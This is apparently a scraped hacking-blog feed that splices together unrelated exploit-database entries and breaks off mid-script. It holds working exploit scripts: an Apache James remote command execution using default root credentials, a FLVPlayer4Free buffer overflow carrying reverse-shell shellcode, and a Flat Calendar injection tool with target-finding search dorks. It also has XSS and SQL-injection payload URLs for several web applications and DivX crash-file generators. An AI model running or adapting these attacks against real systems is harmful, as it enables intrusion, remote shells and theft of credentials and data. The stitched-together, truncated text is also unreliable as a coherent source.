source: https://www.securityfocus.com/bid/47055/info
Alkacon OpenCms is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Versions prior to OpenCms 7.5.4 are vulnerable.
http://www.example.com/opencms/opencms/system/workplace/commons/report-locks.jsp?resourcelist=null&resource=/demo_de&includerelated=false">XSSvector
http://www.example.com/opencms/opencms/system/workplace/views/explorer/contextmenu.jsp?resourcelist=/deco_logo.png&acttarget=514f2">XSSvector
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863123186
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
source: https://www.securityfocus.com/bid/47046/info
OrangeHRM is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
OrangeHRM 2.6.2 is vulnerable; other versions may also be affected.
http://www.example.com/orangehrm-2.6.2/templates/recruitment/jobVacancy.php?recruitcode=%3C/script%3E%3Cscript%3Ealert(0)%3C/script%3E
#!/usr/bin/python
#
# Exploit Title: Apache James Server 2.3.2 Authenticated User Remote Command Execution
# Date: 16\10\2014
# Exploit Author: Jakub Palaczynski, Marcin Woloszyn, Maciej Grabiec
# Vendor Homepage: http://james.apache.org/server/
# Software Link: http://ftp.ps.pl/pub/apache/james/server/apache-james-2.3.2.zip
# Version: Apache James Server 2.3.2
# Tested on: Ubuntu, Debian
# Info: This exploit works on default installation of Apache James Server 2.3.2
# Info: Example paths that will automatically execute payload on some action: /etc/bash_completion.d , /etc/pm/config.d
import socket
import sys
import time
# specify payload
#payload = 'touch /tmp/proof.txt' # to exploit on any user
payload = '[ "$(id -u)" == "0" ] && touch /root/proof.txt' # to exploit only on root
# credentials to James Remote Administration Tool (Default - root/root)
user = 'root'
pwd = 'root'
if len(sys.argv) != 2:
sys.stderr.write("[-]Usage: python %s <ip>\n" % sys.argv[0])
sys.stderr.write("[-]Exemple: python %s 127.0.0.1\n" % sys.argv[0])
sys.exit(1)
ip = sys.argv[1]
def recv(s):
s.recv(1024)
time.sleep(0.2)
try:
print "[+]Connecting to James Remote Administration Tool..."
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((ip,4555))
s.recv(1024)
s.send(user + "\n")
s.recv(1024)
s.send(pwd + "\n")
s.recv(1024)
print "[+]Creating user..."
s.send("adduser ../../../../../../../../etc/bash_completion.d exploit\n")
s.recv(1024)
s.send("quit\n")
s.close()
print "[+]Connecting to James SMTP server..."
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((ip,25))
s.send("ehlo team@team.pl\r\n")
recv(s)
print "[+]Sending payload..."
s.send("mail from: <'@team.pl>\r\n")
recv(s)
# also try s.send("rcpt to: <../../../../../../../../etc/bash_completion.d@hostname>\r\n") if the recipient cannot be found
s.send("rcpt to: <../../../../../../../../etc/bash_completion.d>\r\n")
recv(s)
s.send("data\r\n")
recv(s)
s.send("From: team@team.pl\r\n")
s.send("\r\n")
s.send("'\n")
s.send(payload + "\n")
s.send("\r\n.\r\n")
recv(s)
s.send("quit\r\n")
recv(s)
s.close()
print "[+]Done! Payload will be executed once somebody logs in."
except:
print "Connection failed."
# Exploit Title: Humhub <= 0.10.0-rc.1 multiple persistent XSS vulnerabilities
# Date: 08-12-2014
# Exploit Author: Jos Wetzels, Emiel Florijn
# Vendor Homepage: https://www.humhub.org
# Software Link: https://github.com/humhub/humhub/releases
# Version: <= 0.10.0-rc.1
The Humhub [1] social networking kit versions 0.10.0-rc.1 and prior suffer from multiple persistent Cross-Site Scripting vulnerabilities, which have now been resolved in cooperation with the vendor [2], in various parts of the codebase.
1. Post/comment persistent XSS vulnerability
In the function actionPost() in "/protected/modules_core/post/controllers/PostController.php" [3], the $_POST variable is cleaned using a now-outdated version of the Yii framework's CmsInput extension stripClean() function [4], which improperly sanitizes user-input for XSS [5]. This situation also applies to actionPost() in "/protected/modules_core/comment/controllers/CommentController.php" [6]
Proof of Concept: making a post or comment with the URL-encoded form of either:
<a href = "data:text/html,test">test</a>
<img src = "index.php?r=user/auth/logout">
Will insert the corresponding HTML elements into the post/comment body.
2. Humhub-modules-mail [7] persistent XSS vulnerability
Humhub-modules-mail versions 0.5.9 and prior (when used in conjunction with Humhub 0.10.0-rc.1 or prior) is affected by the same vulnerability as described above. The vulnerable code is located in the function actionCreate() in "/controllers/MailController.php" [8]. Since every private message sent to a humhub user is also sent to the user's e-mail in the form of a HTML-enabled notification e-mail, an attacker can insert custom HTML elements in the body of the e-mail with grave consequences. It should be noted that the displayed in-system private messages are not susceptible to this attack vector.
3. Admin error logging persistent XSS vulnerability
In addition to the above, the admin error logging codebase is vulnerable to a persistent XSS vulnerability (with an even less restrictive set of injectable elements) as well. In most modules' error logging functionality, there is no XSS sanitation on the error message before passing it to the database and since there is no XSS sanitation before displaying error messages in the admin error logging interface, causing an error with a URL-encoded XSS string (different modules' error logging allow for different XSS vectors) in the parameter will cause the XSS to be persistently logged in the admin error logging interface, potentially allowing an attacker, among other attack vectors, to hijack the admin's session.
Proof of Concept: performing either of the following requests:
index.php?r=post/post/post%3Csvg%20onload%3Dalert(1)%3E
index.php?r=mail/mail/indexdf%3Cimg%20src=%22x%22%20onerror=%22alert(1)%22%3E
index.php?r=notification/list/index&from=999)%3Cscript%3Ealert(1)%3C/script%3E
Wil insert the corresponding script elements into the admin error logging interface.
It should be noted that all XSS attack vectors require at least regular user-level access to the humhub system.
[*] References:
1. http://humhub.org
2. https://github.com/humhub/humhub/commit/febb89ab823d0bd6246c6cf460addabb6d7a01d4
3. https://github.com/humhub/humhub/blob/22d4cc040b56ed72c7bdc17a14af087b06a2cf18/protected/modules_core/post/controllers/PostController.php#L41
4. https://github.com/humhub/humhub/blob/9274a701b316cf8da0d05862066a90a3585fff01/protected/extensions/CmsInput.php#L165
5. http://packetstormsecurity.com/files/129373/yiicmsinput-xss.txt
6. https://github.com/humhub/humhub/blob/22d4cc040b56ed72c7bdc17a14af087b06a2cf18/protected/modules_core/comment/controllers/CommentController.php#L139
7. https://github.com/humhub/humhub-modules-mail
8. https://github.com/humhub/humhub-modules-mail/blob/04e4f2dad17ed0e4aec0d5a61a5ef979f416e98b/controllers/MailController.php#L300
En este post vamos a estar resolviendo el laboratorio de PortSwigger: “Reflected XSS into HTML context with nothing encoded”.
Para resolver el laboratorio tenemos que realizar un Cross-site Scripting que llame a la función alert.
Cuando entramos en el laboratorio, vemos un campo de búsqueda:
Vamos a probar a buscar cualquier cosa:
Si nos fijamos, el término de búsqueda se ve reflejado en la web. Por lo que, podemos probar a meter un código Javascript usando el atributo onerror en el tag <img>.
De tal forma, que si falla al cargar la imagen que especificamos en el atributo src, se nos ejecutará lo que escribimos en onerror:
Como vemos, efectivamente vemos que ha fallado al cargar la imagen, por tanto, se nos ejecuta el alert. De esta forma, conseguimos resolver el laboratorio.
# Exploit Title: Humhub <= 0.10.0-rc.1 SQL injection vulnerability
# Date: 08-12-2014
# Exploit Author: Jos Wetzels, Emiel Florijn
# Vendor Homepage: https://www.humhub.org
# Software Link: https://github.com/humhub/humhub/releases
# Version: <= 0.10.0-rc.1
The Humhub [1] social networking kit versions 0.10.0-rc.1 and prior suffer from an SQL injection vulnerability, which has now been resolved in cooperation with the vendor [2], in its notification listing functionality allowing an attacker to obtain backend database access. In the actionIndex() function located in "/protected/modules_core/notification/controllers/ListController.php" [3] a check is performed on the unsanitized $lastEntryId variable (which is fetched from the 'from' GET parameter) to see if it is greater than 0. However, since PHP uses type-unstrict comparisons and $lastEntryId isn't guaranteed to be an integer, this allows an attacker to prefix their string of choice with any number of integers (so that $lastEntryId gets treated as an integer during the comparison) such that the comparison evaluates to true and $criteria->condition is injected with the otherwise unsanitized $lastEntryId, which can be any SQL injection.
Proof of Concept: Performing the following request
index.php?r=notification/list/index&from=999) AND (CASE WHEN 0x30<(SELECT substring(password,1,1) FROM user_password WHERE id = 1) THEN 1 ELSE 0 END) AND (1=1
Allows an attacker to perform a binary search SQL injection. In addition, the SQL error handling of the function in question allows the attacker to perform a reflected Cross-Site Scripting attack.
Proof of Concept: Directing any user to the following link
index.php/?r=notification/list/index&from=999) AND ("<iframe src = 'index.php/?r=user/auth/logout'>"=""
Will perform a CSRF attack against the target user.
It should be noted that the attack requires regular user-level authentication to the humhub system.
[*] References:
1. http://humhub.org
2. https://github.com/humhub/humhub/commit/febb89ab823d0bd6246c6cf460addabb6d7a01d4
3. https://github.com/humhub/humhub/blob/e406538ac44f992774e1abd3748ee0a65469829d/protected/modules_core/notification/controllers/ListController.php#L46
source: https://www.securityfocus.com/bid/47045/info
FLVPlayer4Free is prone to a remote buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied input.
Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.
FLVPlayer4Free 2.9.0 is vulnerable; other versions may also be affected.
#!/usr/bin/perl
###
# Title : FLVPlayer4Free v2.9 (.fp4f) Stack Overflow
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Twitter page : twitter.com/kedans
# platform : Windows
# Impact : Stack Overflow
# Tested on : Windows XP SP3 Fran�ais
# Target : FLVPlayer4Free v 2.9.0
###
# Note : BAC 2011 Enchallah ( KedAns 'me' & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all )
# ------------
#START SYSTEM /root@MSdos/ :
system("title KedAns-Dz");
system("color 1e");
system("cls");
print "\n\n";
print " |=============================================|\n";
print " |= [!] Name : FLVPlayer4Free (.fp4f) v2.9 =|\n";
print " |= [!] Exploit : Stack Overflow Exploit =|\n";
print " |= [!] Author : KedAns-Dz =|\n";
print " |= [!] Mail: Ked-h(at)hotmail(dot)com =|\n";
print " |=============================================|\n";
sleep(2);
print "\n";
my $junk= "http://"."\x41" x 17425;
my $eip = pack('V',0x7C86467B); # jmp esp from kernel32.dll
my $padding = "\x90" x 30;
# windows/shell_reverse_tcp - 739 bytes (http://www.metasploit.com)
# Encoder: x86/alpha_mixed
# LHOST=127.0.0.1, LPORT=4444
my $shellcode =
"\x56\x54\x58\x36\x33\x30\x56\x58\x48\x34\x39\x48\x48\x48" .
"\x50\x68\x59\x41\x41\x51\x68\x5a\x59\x59\x59\x59\x41\x41" .
"\x51\x51\x44\x44\x44\x64\x33\x36\x46\x46\x46\x46\x54\x58" .
"\x56\x6a\x30\x50\x50\x54\x55\x50\x50\x61\x33\x30\x31\x30" .
"\x38\x39\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" .
"\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41" .
"\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42" .
"\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b\x4c\x49" .
"\x78\x4e\x69\x45\x50\x47\x70\x43\x30\x51\x70\x4e\x69\x4d" .
"\x35\x44\x71\x4e\x32\x45\x34\x4c\x4b\x43\x62\x44\x70\x4c" .
"\x4b\x51\x42\x44\x4c\x4e\x6b\x50\x52\x47\x64\x4c\x4b\x44" .
"\x32\x46\x48\x44\x4f\x4f\x47\x43\x7a\x46\x46\x45\x61\x4b" .
"\x4f\x50\x31\x4f\x30\x4e\x4c\x45\x6c\x50\x61\x51\x6c\x45" .
"\x52\x46\x4c\x45\x70\x49\x51\x4a\x6f\x44\x4d\x43\x31\x4b" .
"\x77\x4a\x42\x4c\x30\x50\x52\x42\x77\x4e\x6b\x43\x62\x44" .
"\x50\x4c\x4b\x42\x62\x47\x4c\x43\x31\x48\x50\x4e\x6b\x51" .
"\x50\x42\x58\x4e\x65\x4b\x70\x51\x64\x50\x4a\x46\x61\x4e" .
"\x30\x46\x30\x4e\x6b\x51\x58\x44\x58\x4e\x6b\x43\x68\x45" .
"\x70\x46\x61\x49\x43\x4b\x53\x45\x6c\x47\x39\x4e\x6b\x46" .
"\x54\x4e\x6b\x47\x71\x49\x46\x45\x61\x49\x6f\x50\x31\x49" .
"\x50\x4e\x4c\x4b\x71\x48\x4f\x44\x4d\x45\x51\x49\x57\x46" .
"\x58\x4b\x50\x43\x45\x49\x64\x44\x43\x51\x6d\x48\x78\x45" .
"\x6b\x51\x6d\x46\x44\x50\x75\x48\x62\x46\x38\x4c\x4b\x43" .
"\x68\x47\x54\x47\x71\x4e\x33\x43\x56\x4c\x4b\x46\x6c\x42" .
"\x6b\x4e\x6b\x42\x78\x45\x4c\x47\x71\x4a\x73\x4e\x6b\x43" .
"\x34\x4c\x4b\x47\x71\x48\x50\x4d\x59\x51\x54\x44\x64\x51" .
"\x34\x43\x6b\x43\x6b\x50\x61\x43\x69\x42\x7a\x43\x61\x4b" .
"\x4f\x4d\x30\x46\x38\x51\x4f\x51\x4a\x4c\x4b\x47\x62\x48" .
"\x6b\x4c\x46\x43\x6d\x45\x38\x45\x63\x44\x72\x47\x70\x43" .
"\x30\x42\x48\x50\x77\x42\x53\x46\x52\x51\x4f\x43\x64\x45" .
"\x38\x42\x6c\x50\x77\x51\x36\x43\x37\x4b\x4f\x4a\x75\x4f" .
"\x48\x4a\x30\x45\x51\x45\x50\x47\x70\x51\x39\x4f\x34\x50" .
"\x54\x42\x70\x45\x38\x46\x49\x4d\x50\x42\x4b\x43\x30\x49" .
"\x6f\x48\x55\x50\x50\x50\x50\x50\x50\x50\x50\x47\x30\x42" .
"\x70\x51\x50\x46\x30\x43\x58\x4a\x4a\x46\x6f\x49\x4f\x4d" .
"\x30\x4b\x4f\x49\x45\x4d\x59\x48\x47\x45\x38\x51\x6f\x47" .
"\x70\x45\x50\x47\x71\x43\x58\x46\x62\x45\x50\x44\x51\x43" .
"\x6c\x4b\x39\x4d\x36\x42\x4a\x42\x30\x50\x56\x51\x47\x45" .
"\x38\x4e\x79\x4e\x45\x42\x54\x51\x71\x4b\x4f\x4b\x65\x50" .
"\x68\x50\x63\x50\x6d\x45\x34\x45\x50\x4d\x59\x48\x63\x42" .
"\x77\x50\x57\x42\x77\x46\x51\x4a\x56\x50\x6a\x46\x72\x50" .
"\x59\x46\x36\x4b\x52\x4b\x4d\x42\x46\x48\x47\x42\x64\x44" .
"\x64\x47\x4c\x45\x51\x46\x61\x4c\x4d\x51\x54\x47\x54\x46" .
"\x70\x48\x46\x45\x50\x47\x34\x51\x44\x50\x50\x42\x76\x42" .
"\x76\x46\x36\x50\x46\x46\x36\x42\x6e\x42\x76\x46\x36\x51" .
"\x43\x46\x36\x50\x68\x51\x69\x48\x4c\x47\x4f\x4e\x66\x4b" .
"\x4f\x4e\x35\x4f\x79\x4b\x50\x50\x4e\x43\x66\x51\x56\x49" .
"\x6f\x44\x70\x43\x58\x45\x58\x4f\x77\x45\x4d\x43\x50\x49" .
"\x6f\x4e\x35\x4f\x4b\x4a\x50\x4f\x45\x4e\x42\x51\x46\x42" .
"\x48\x4c\x66\x4f\x65\x4d\x6d\x4d\x4d\x4b\x4f\x4a\x75\x45" .
"\x6c\x45\x56\x51\x6c\x47\x7a\x4b\x30\x49\x6b\x4b\x50\x50" .
"\x75\x47\x75\x4d\x6b\x47\x37\x46\x73\x44\x32\x42\x4f\x50" .
"\x6a\x43\x30\x42\x73\x49\x6f\x48\x55\x41\x41";
open(file , ">", "Kedans.fp4f");
print file $junk.$eip.$padding.$shellcode;
print "\n [+] File successfully created!\n" or die print "\n [-] OpsS! File is Not Created !! ";
close(file);
#================[ Exploited By KedAns-Dz * HST-Dz * ]===========================================
# Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS >
# Islampard * Zaki.Eng * Dr.Ride * Red1One * Badr0 * XoreR * Nor0 FouinY * Hani * Mr.Dak007 * Fox-Dz
# Masimovic * TOnyXED * cr4wl3r (Inj3ct0r.com) * TeX (hotturks.org) * KelvinX (kelvinx.net) * Dos-Dz
# Nayla Festa * all (sec4ever.com) Members * PLATEN (Pentesters.ir) * Gamoscu (www.1923turk.com)
# Greets to All ALGERIANS EXPLO!TER's & DEVELOPER's :=> {{
# Indoushka (Inj3ct0r.com) * [ Ma3sTr0-Dz * MadjiX * BrOx-Dz * JaGo-Dz (sec4ever.com) ] * Dr.0rYX
# Cr3w-DZ * His0k4 * El-Kahina * Dz-Girl * SuNHouSe2 ; All Others && All My Friends . }} ,
# www.packetstormsecurity.org * exploit-db.com * bugsearch.net * 1337day.com * x000.com
# www.metasploit.com * www.securityreason.com * All Security and Exploits Webs ...
#================================================================================================
#!/usr/bin/perl -w
#Title : Flat Calendar v1.1 HTML Injection Exploit
#Download : http://www.circulargenius.com/flatcalendar/FlatCalendar-v1.1.zip
#Author : ZoRLu / zorlu@milw00rm.com
#Website : http://milw00rm.com / its online
#Twitter : https://twitter.com/milw00rm or @milw00rm
#Test : Windows7 Ultimate
#Date : 08/12/2014
#Thks : exploit-db.com, packetstormsecurity.com, securityfocus.com, sebug.net and others
#BkiAdam : Dr.Ly0n, KnocKout, LifeSteaLeR, Nicx (harf sirali :)) )
#Dork1 : intext:"Flat Calendar is powered by Flat File DB"
#Dork2 : inurl:"viewEvent.php?eventNumber="
#
#C:\Users\admin\Desktop>perl flat.pl
#
#Usage: perl flat.pl http://server /calender_path/ indexfile nickname
#Exam1: perl flat.pl http://server / index.html ZoRLu
#Exam2: perl flat.pl http://server /calendar/ index.html ZoRLu
#
#C:\Users\admin\Desktop>perl flat.pl http://server /member_content/diaries/womens/calendar/ index.html ZoRLu
#
#[+] Target: http://server
#[+] Path: /member_content/diaries/womens/calendar/
#[+] index: index.html
#[+] Nick: ZoRLu
#[+] Exploit Succes
#[+] Searching url...
#[+] YourEventNumber = 709
#[+] http://server/member_content/diaries/womens/calendar/viewEvent.php?eventNumber=709
use HTTP::Request::Common qw( POST );
use LWP::UserAgent;
use IO::Socket;
use strict;
use warnings;
sub hlp() {
system(($^O eq 'MSWin32') ? 'cls' : 'clear');
print "\nUsage: perl $0 http://server /calender_path/ indexfile nickname\n";
print "Exam1: perl $0 http://server / index.html ZoRLu\n";
print "Exam2: perl $0 http://server /calendar/ index.html ZoRLu\n";
}
if(@ARGV != 4) {
hlp();
exit();
}
my $ua = LWP::UserAgent->new;
my $url = $ARGV[0];
my $path = $ARGV[1];
my $index = $ARGV[2];
my $nick = $ARGV[3];
my $vuln = $url . $path . "admin/calAdd.php";
print "\n[+] Target: ".$url."\n";
print "[+] Path: ".$path."\n";
print "[+] index: ".$index."\n";
print "[+] Nick: ".$nick."\n";
my @months = qw(January February March April May June July August September October November December);
my ($day, $month, $yearset) = (localtime)[3,4,5];
my $year = 1900 + $yearset;
my $moon = $months[$month];
if (open(my $fh, $index)) {
while (my $row = <$fh>) {
chomp $row;
my $req = POST $vuln, [
event => 'Test Page',
description => $row,
month => $moon,
day => $day,
year => $year,
submitted => $nick,
];
my $resp = $ua->request($req);
if ($resp->is_success) {
my $message = $resp->decoded_content;
my $regex = "Record Added: taking you back";
if ($message =~ /$regex/) {
print "[+] Exploit Succes\n";
my $newua = LWP::UserAgent->new( );
my $newurl = $url . $path . "calendar.php";
my $newreq = $newua->get($newurl);
if ($newreq->is_success) {
my $newmessage = $newreq->decoded_content;
my $first = rindex($newmessage,"viewEvent.php?eventNumber=");
print "[+] Searching url...\n";
my $request = substr($newmessage, $first+26, 4);
print "[+] YourEventNumber = $request\n";
sleep(1);
print "[+] ".$url.$path."viewEvent.php?eventNumber=".$request."\n";
}
else {
print "[-] HTTP POST error code: ", $newreq->code, "\n";
print "[-] HTTP POST error message: ", $newreq->message, "\n";
}
}
else {
print "[-] Exploit Failed";
}
}
else {
print "[-] HTTP POST error code: ", $resp->code, "\n";
print "[-] HTTP POST error message: ", $resp->message, "\n";
}
}
}
else {
sleep(1);
die ("[-] NotFound: $index\n");
}
source: https://www.securityfocus.com/bid/47044/info
Cetera eCommerce is prone to multiple cross-site scripting and SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Cetera eCommerce versions 15.0 and prior are vulnerable.
Cross Site Scripting:
http://www.example.com/catalog/%3Cscript%3Ealert(document.cookie)%3C/script%3E/
http://www.example.com/vendors/%3Cscript%3Ealert(document.cookie)%3C/script%3E/
http://www.example.com/catalog/cart/%3Cscript%3Ealert(document.cookie)%3C/script%3E/
http://www.example.com/news/%3Cscript%3Ealert(document.cookie)%3C/script%3E/
http://www.example.com/news/13012011111030/%3Cscript%3Ealert(document.cookie)%3C/script%3E/
http://www.example.com/%3Cscript%3Ealert(document.cookie)%3C/script%3E/
This vulnerability have appeared in version 15.0. Vulnerability takes place
at page with error 404, so it'll work as at this URL, as at other URLs,
which lead to non-existent pages.
SQL Injection:
http://www.example.com/catalog/(version()=5.1)/
http://www.example.com/catalog/cart/.+benchmark(100000,md5(now()))+./
source: https://www.securityfocus.com/bid/47042/info
DivX Player is prone to multiple remote buffer-overflow vulnerabilities because the application fails to perform adequate boundary checks on user-supplied input.
Attackers may leverage these issues to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.
DivX Player 6.0, 6.8, 6.9, and 7.0 are vulnerable; other versions may also be affected.
================================
#!/usr/bin/perl
###
# Title : DivX Player v7.0 (.avi) Buffer Overflow
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Twitter page : twitter.com/kedans
# platform : Windows
# Impact : Overflow in 'DivX Player.exe' Process
# Tested on : Windows XP SP3 Fran.ais
# Target : DivX Player v6.8 & 6.9 & 7.0
###
# Note : BAC 2011 Enchallah ( KedAns 'me' & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all )
# ------------
# Usage : 1 - Creat AVI file (14 bytes)
# => 2 - Open AVI file With DivX Player
# => 3 - OverFlow & Crshed !!!
# ------------
# Homologue Bug in MP_Classic: (http://exploit-db.com/exploits/11535) || By : cr4wl3r
# ------------
# Assembly Error in [quartz.dll] ! 74872224() ! :
# 0x74872221 ,0x83 0xd2 0x00 || [adc] edx,0
# 0x74872224 ,0xf7 0xf1 [div] || eax,acx << (" Error Here ")
# 0x74872226 ,0x0f 0xa4 0xc2 0x10 [shld] || edx,eax,10h
# ------------
#START SYSTEM /root@MSdos/ :
system("title KedAns-Dz");
system("color 1e");
system("cls");
print "\n\n";
print " |============================================|\n";
print " |= [!] Name : DivX Player v6 & 7.0 AVI File =|\n";
print " |= [!] Exploit : Local Buffer Overflow =|\n";
print " |= [!] Author : KedAns-Dz =|\n";
print " |= [!] Mail: Ked-h(at)hotmail(dot)com =|\n";
print " |============================================|\n";
sleep(2);
print "\n";
# Creating ...
my $PoC = "\x4D\x54\x68\x64\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00"; # AVI Header
open(file , ">", "Kedans.avi"); # Evil File AVI (14 bytes) 4.0 KB
print file $PoC;
print "\n [+] File successfully created!\n" or die print "\n [-] OpsS! File is Not Created !! ";
close(file);
# Thanks To : ' cr4wl3r ' From Indonesia & All Indonesia MusLim HacKers
#================[ Exploited By KedAns-Dz * HST-Dz * ]===========================================
# Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS >
# Islampard * Zaki.Eng * Dr.Ride * Red1One * Badr0 * XoreR * Nor0 FouinY * Hani * Mr.Dak007 * Fox-Dz
# Masimovic * TOnyXED * cr4wl3r (Inj3ct0r.com) * TeX (hotturks.org) * KelvinX (kelvinx.net) * Dos-Dz
# Nayla Festa * all (sec4ever.com) Members * PLATEN (Pentesters.ir) * Gamoscu (www.1923turk.com)
# Greets to All ALGERIANS EXPLO!TER's & DEVELOPER's :=> {{
# Indoushka (Inj3ct0r.com) * [ Ma3sTr0-Dz * MadjiX * BrOx-Dz * JaGo-Dz (sec4ever.com) ] * Dr.0rYX
# Cr3w-DZ * His0k4 * El-Kahina * Dz-Girl * SuNHouSe2 ; All Others && All My Friends . }} ,
# www.packetstormsecurity.org * exploit-db.com * bugsearch.net * 1337day.com * x000.com
# www.metasploit.com * www.securityreason.com * All Security and Exploits Webs ...
#================================================================================================
================================
#!/usr/bin/perl
###
# Title : DivX Player v7.0 (.ape) Buffer Overflow
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Twitter page : twitter.com/kedans
# platform : Windows
# Impact : Overflow in 'DivX Player.exe' Process
# Tested on : Windows XP SP3 Fran.ais
# Target : DivX Player v6.8 & 6.9 & 7.0
###
# Note : BAC 2011 Enchallah ( KedAns 'me' & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all )
# ------------
# Usage : 1 - Creat APE file ( Monkey's Audio Format )
# => 2 - Open APE file With DivX Player
# => 3 - OverFlow !!!
# Assembly Error in [MonkeySource.ax] ! 0f4151a6() ! :
# 0x0f4151a3 ,0xc2 0x80 0x00 [ret] || 8
# 0x0f4151a6 ,0xf7 0xf3 [div] || eax,abx << (" Error Here ")
# 0x0f4151a8 ,0x31 0xd2 [xor] || edx,edx
# 0x0f4151aa ,0xeb 0xf3 [jmp] || 0x0f41519f
# 0x0f4151ac ,0xc3 [ret] ||
# ------------
#START SYSTEM /root@MSdos/ :
system("title KedAns-Dz");
system("color 1e");
system("cls");
print "\n\n";
print " |===========================================================|\n";
print " |= [!] Name : DivX Player v6 & 7.0 || Monkey's Audio File =|\n";
print " |= [!] Exploit : Buffer Overflow Exploit =|\n";
print " |= [!] Author : KedAns-Dz =|\n";
print " |= [!] Mail: Ked-h(at)hotmail(dot)com =|\n";
print " |===========================================================|\n";
sleep(2);
print "\n";
# Creating ...
my $PoC = "\x4D\x41\x43\x20\x96\x0f\x00\x00\x34\x00\x00\x00\x18\x00\x00\x00"; # APE Header
open(file , ">", "Kedans.ape"); # Evil File APE (16 bytes) 4.0 KB
print file $PoC;
print "\n [+] File successfully created!\n" or die print "\n [-] OpsS! File is Not Created !! ";
close(file);
#================[ Exploited By KedAns-Dz * HST-Dz * ]===========================================
# Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS >
# Islampard * Zaki.Eng * Dr.Ride * Red1One * Badr0 * XoreR * Nor0 FouinY * Hani * Mr.Dak007 * Fox-Dz
# Masimovic * TOnyXED * cr4wl3r (Inj3ct0r.com) * TeX (hotturks.org) * KelvinX (kelvinx.net) * Dos-Dz
# Nayla Festa * all (sec4ever.com) Members * PLATEN (Pentesters.ir) * Gamoscu (www.1923turk.com)
# Greets to All ALGERIANS EXPLO!TER's & DEVELOPER's :=> {{
# Indoushka (Inj3ct0r.com) * [ Ma3sTr0-Dz * MadjiX * BrOx-Dz * JaGo-Dz (sec4ever.com) ] * Dr.0rYX
# Cr3w-DZ * His0k4 * El-Kahina * Dz-Girl * SuNHouSe2 ; All Others && All My Friends . }} ,
# www.packetstormsecurity.org * exploit-db.com * bugsearch.net * 1337day.com * x000.com
# www.metasploit.com * www.securityreason.com * All Security and Exploits Webs ...
#================================================================================================
================================
#!/usr/bin/perl
###
# Title : DivX Player v7.0 (.mid) Buffer Overflow
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Twitter page : twitter.com/kedans
# platform : Windows
# Impact : Overflow in 'DivX Player.exe' Process
# Tested on : Windows XP SP3 Fran.ais
# Target : DivX Player v6.8 & 6.9 & 7.0
###
# Note : BAC 2011 Enchallah ( KedAns 'me' & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all )
# ------------
# Usage : 1 - Creat MID file
# => 2 - Open MID file With DivX Player
# => 3 - OverFlow !!!
# ------------
# Homologue Bug in MP_Classic: (http://exploit-db.com/exploits/9620) || By : PLATEN
# ------------
# Assembly Error in [quartz.dll] ! 74872224() ! :
# 0x74872221 ,0x83 0xd2 0x00 || [adc] edx,0
# 0x74872224 ,0xf7 0xf1 [div] || eax,acx << (" Error Here ")
# 0x74872226 ,0x0f 0xa4 0xc2 0x10 [shld] || edx,eax,10h
# ------------
#START SYSTEM /root@MSdos/ :
system("title KedAns-Dz");
system("color 1e");
system("cls");
print "\n\n";
print " |===========================================|\n";
print " |= [!] Name : DivX Player v6 & 7.0 (.mid) =|\n";
print " |= [!] Exploit : Buffer Overflow Exploit =|\n";
print " |= [!] Author : KedAns-Dz =|\n";
print " |= [!] Mail: Ked-h(at)hotmail(dot)com =|\n";
print " |===========================================|\n";
sleep(2);
print "\n";
# Creating ...
my $PoC = # MID Header
"\x4d\x54\x68\x64\x00\x00\x00\x06\x00\x01\x00\x01\x00\x60\x4d\x54".
"\x72\x6b\x00\x00\x00\x4e\x00\xff\x03\x08\x34\x31\x33\x61\x34\x61".
"\x35\x30\x00\x91\x41\x60\x01\x3a\x60\x01\x4a\x60\x01\x50\x60\x7d".
"\x81\x41\x01\x01\x3a\x5f\x8d\xe4\xa0\x01\x50\x01\x3d\x91\x41\x60".
"\x81\x00\x81\x41\x40\x00\x91\x3a\x60\x81\x00\x76\x6f\xcc\x3d\xa6".
"\xc2\x48\xee\x8e\xca\xc2\x57\x00\x91\x50\x60\x81\x00\x81\x50\x40".
"\x00\xff\x2f\x00";
open(file , ">", "Kedans.mid"); # Evil File MID (100 bytes) 4.0 KB
